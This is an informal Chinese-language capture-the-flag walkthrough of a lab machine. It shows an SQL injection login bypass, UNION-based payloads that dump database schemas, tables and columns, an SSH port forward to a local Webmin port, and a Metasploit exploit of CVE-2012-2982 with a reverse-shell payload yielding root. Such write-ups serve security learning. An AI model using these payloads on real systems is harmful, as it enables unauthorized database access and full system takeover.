万能密码登录额

' or 1=1 -- -
好久没打了都忘了这是可以说的吗(

searchitem=' union select 1,2,(SELECT group_concat(schema_name) FROM information_schema.schemata) -- -

searchitem=' union select 1,2,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'db') -- -

searchitem=' union select 1,2,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'db' AND table_name = 'users') -- -

Pasted%20image%2020240412200918

直接看user吧
pwd

ssh上去
查看套接字ss -tulpn


Netid  State      Recv-Q Send-Q            Local Address:Port                           Peer Address:Port              
udp    UNCONN     0      0                             *:68                                        *:*                  
udp    UNCONN     0      0                             *:10000                                     *:*                  
tcp    LISTEN     0      80                    127.0.0.1:3306                                      *:*                  
tcp    LISTEN     0      128                           *:10000                                     *:*                  
tcp    LISTEN     0      128                           *:22                                        *:*                  
tcp    LISTEN     0      128                          :::80                                       :::*                  
tcp    LISTEN     0      128                          :::22                                       :::*

显然有个10000端口,做个代理出来
ssh -L 10000:localhost:10000 agent47@10.10.8.98

CVE-2012-2982
但是 我上一步代理死活出不去,猜测靶机寄了,不知道什么情况
测,靶机没寄啊
测,还得是frp啊

很麻烦的

search CVE-2012-2982
use 0
set rhost 10.17.6.173
set rport 9003
set ssl false

set payload cmd/unix/reverse
set lhost 10.17.6.173
run

拿到root shell
结束